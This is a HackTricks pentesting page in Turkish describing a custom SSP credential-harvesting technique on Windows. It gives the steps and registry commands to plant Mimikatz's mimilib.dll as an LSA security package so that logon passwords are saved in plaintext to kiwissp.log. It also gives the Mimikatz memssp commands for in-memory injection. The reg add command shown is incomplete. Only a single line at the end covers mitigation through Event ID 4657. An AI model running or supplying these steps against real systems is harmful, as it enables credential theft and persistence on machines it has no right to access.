hacktricks/windows-hardening/active-directory-methodology/custom-ssp.md

3.8 KiB
Raw Permalink Blame History

Custom SSP

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Custom SSP

SSP (Güvenlik Destek Sağlayıcısı) nedir burada öğrenin.
Kendi SSP'nizi oluşturabilirsiniz, böylece makineye erişmek için kullanılan kimlik bilgilerini düz metin olarak yakalayabilirsiniz.

Mimilib

Mimikatz tarafından sağlanan mimilib.dll ikili dosyasını kullanabilirsiniz. Bu, tüm kimlik bilgilerini düz metin olarak bir dosyaya kaydedecektir.
Dll dosyasını C:\Windows\System32\ dizinine bırakın.
Mevcut LSA Güvenlik Paketlerinin bir listesini alın:

{% code title="attacker@target" %}

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

{% endcode %}

mimilib.dll dosyasını Güvenlik Destek Sağlayıcıları listesine (Güvenlik Paketleri) ekleyin:

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

Ve bir yeniden başlatmadan sonra tüm kimlik bilgileri C:\Windows\System32\kiwissp.log dosyasında düz metin olarak bulunabilir.

Bellekte

Bunu doğrudan belleğe Mimikatz kullanarak da enjekte edebilirsiniz (biraz kararsız/çalışmayabileceğini unutmayın):

privilege::debug
misc::memssp

Bu yeniden başlatmalara dayanmaz.

Hafifletme

Olay ID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages oluşturma/değiştirme denetimi

{% hint style="success" %} AWS Hacking öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin
{% endhint %}